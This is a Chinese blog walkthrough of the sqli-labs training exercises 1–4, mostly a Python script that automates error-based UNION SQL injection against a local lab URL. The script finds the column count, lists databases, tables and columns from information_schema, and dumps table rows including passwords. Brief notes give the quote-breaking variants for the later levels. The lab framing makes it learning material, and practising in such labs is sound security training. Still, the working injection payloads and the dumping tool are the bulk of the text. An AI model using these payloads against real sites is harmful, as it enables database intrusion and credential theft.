sqli-labs:1-4,基于报错的注入
Posted sanbuzhi的博客
sqli1:
脚本
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 23 09:37:14 2019

@author: kenshin

Walkthrough script for sqli-labs Less-1, the error-based exercise of the
local training lab at http://localhost/sqli-labs/.  Each helper appends a
payload to the lab URL, fetches the page with ``requests`` and scrapes the
lab's own "Your Login name:" / "Your Password:" markers out of the HTML,
so the parsing only fits that page layout.
"""

import requests,re
# Base URL of the local lab target; every helper appends its payload to it.
url = 'http://localhost/sqli-labs/Less-1/?id=-1'

def Len_OrderBy(url: str) -> int:
    """Probe the column count of the lab query with ``order by <i>``.

    Returns ``i-1`` for the first ``i`` whose response contains the
    ``Unknown column`` error marker.

    NOTE(review): the loop is bounded by the "assume at most 20 columns"
    guess below; if no response ever carries the marker the loop falls
    through with ``i == 19`` and 18 is returned, which is indistinguishable
    from a genuine detection.
    """
    pattern_mark = 'Unknown column'
    # Assume the column count is below 20.
    for i in range(1,20):
        url_new = url + "\' order by "+ str(i) +"--+"
        r = requests.get(url_new)
        if(re.findall(pattern_mark,r.text)):
            print('the lenght of column(order by) is :' + str(i-1) + "\n")
            break
    return i-1

def get_DB(url: str, lenght: int) -> None:
    """Print every schema name the lab page echoes back.

    ``lenght`` is the column count from :func:`Len_OrderBy`; the UNION
    SELECT is padded with that many ``group_concat(schema_name)`` columns.
    NOTE: ``str`` is rebound to a local accumulator here, shadowing the
    builtin; harmless in this function because ``str()`` is never called
    after the rebinding.
    """
    # Note: this pattern yields a list with a single element (the
    # comma-joined group_concat value); it is split on ',' below so each
    # entry can be printed on its own line.
    pattern_mark = 'Your Login name:(.+?)<br>'
    str = ''
    for i in range(1,lenght):
        str += 'group_concat(schema_name),'
    str += 'group_concat(schema_name)'
    payload = '\' union select ' + str +' from information_schema.schemata--+'
    url += payload
    r = requests.get(url)
    r = re.findall(pattern_mark,r.text)
    # list -> str
    str_tmp = "".join(r)
    # re.split on ','
    lst = re.split(',',str_tmp)
    print('-'*9 + 'databases' + '-'*8)
    for s in lst:
        print('.' + s )
    print('-'*25)

def get_TB(url: str, lenght: int, db: str) -> None:
    """Print the table names of schema ``db`` as echoed by the lab page.

    ``db`` is spliced into the payload verbatim (it comes from ``input()``
    at module level).  Same column padding and result parsing as
    :func:`get_DB`; ``str`` is shadowed here in the same harmless way.
    """
    pattern_mark = 'Your Login name:(.+?)<br>'
    str = ''
    for i in range(1,lenght):
        str += 'group_concat(table_name),'
    str += 'group_concat(table_name)'
    payload = "\' union select "+ str +" from information_schema.tables where table_schema=\'" + db + "\'--+"
    url += payload
    r = requests.get(url)
    r = re.findall(pattern_mark,r.text)
    # list -> str
    str_tmp = "".join(r)
    # re.split on ','
    lst = re.split(',',str_tmp)
    print('-'*9 +'Database '+ db +'\'s Tables' + '-'*8)
    for s in lst:
        print('.' + s )
    print('-'*35)

def get_Column(url: str, lenght: int, tb: str) -> None:
    """Print the column names of table ``tb`` as echoed by the lab page.

    Mirrors :func:`get_TB`; note the lookup is by ``table_name`` only, so
    same-named tables in other schemas would be merged into the output.
    ``str`` is shadowed here in the same harmless way as in :func:`get_DB`.
    """
    pattern_mark = 'Your Login name:(.+?)<br>'
    str = ''
    for i in range(1,lenght):
        str += 'group_concat(column_name),'
    str += 'group_concat(column_name)'
    payload = "\' union select " +str+ " from information_schema.columns where table_name=\'" +tb+ "\'--+"
    url += payload
    r = requests.get(url)
    r = re.findall(pattern_mark,r.text)
    # list -> str
    str_tmp = ''.join(r)
    # re.split on ','
    lst = re.split(',',str_tmp)
    print('-'*9 +'Table '+ tb +'\'s Columns' + '-'*8)
    for s in lst:
        print('.' + s )
    print('-'*35)

def get_data(url: str, lenght: int, tb: str, data: str) -> None:
    """Dump rows of table ``tb`` one ``id`` at a time and print them.

    ``data`` is a comma-separated list of column names chosen by the user;
    it is padded with literal column numbers up to ``lenght`` entries.
    Rows are requested for id 1..99 and the loop stops at the first id for
    which neither marker is found in the page.
    """
    pattern_mark = 'Your Login name:(.+?)<br>'
    pattern_mark_pass = 'Your Password:(.+?)</font>'
    # Example of the padding below:
    #   if lenght=5
    #   data=a,b,c
    #   after expansion
    #   data=a,b,c,4,5
    # str -> list
    lst = data.split(",")
    while len(lst) < lenght:
        lst.append(str(len(lst)+1))
    # list -> str
    sn = ''
    for i in lst:
        sn += i+","
    # The loop above leaves sn='a,b,c,'; the trailing ',' must be dropped
    # for the payload to be well-formed.
    sn=sn.rstrip(",")
    # Formatted output header.
    print('-'*9 +'Table '+ tb +'\'s All datas' + '-'*8)
    # Assume at most 100 rows.
    for i in range(1,100):
        payload = "\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+"
        url_new = url + payload
        # Both names point at the same response; each is then replaced by
        # its own findall() result.
        r = r_pass = requests.get(url_new)
        r = re.findall(pattern_mark,r.text)
        r_pass = re.findall(pattern_mark_pass,r_pass.text)
        # Column widths 16/18 are cosmetic; a negative repeat count just
        # yields no padding.
        print(str(r) +" "*(16-len(str(r)))+"=> "+str(r_pass)+" "*(18-len(str(r_pass)))+"|")
        if (len(r)==0 and len(r_pass)==0):
            break
    print("-"*41)

# Interactive driver -- runs at import time, there is no __main__ guard.
# Column count
lenght = Len_OrderBy(url)
# All databases
get_DB(url,lenght)
# Tables of the chosen database
db = input("select databases >> ")
get_TB(url,lenght,db)
# Columns of the chosen table
tb = input("select table >> ")
# NOTE(review): passes a literal 3 instead of ``lenght``, unlike every
# other call in this driver.
get_Column(url,3,tb)
# Rows of the chosen table for the chosen columns
data = input("select columns (no more than " +str(lenght)+ ",and separate by ',') >> ")
get_data(url,lenght,tb,data)
sqli2:
与sqli1比较,少了 ',对id没有经过处理。
sqli3:
对id经过了')处理
sqli4:
对id经过了")处理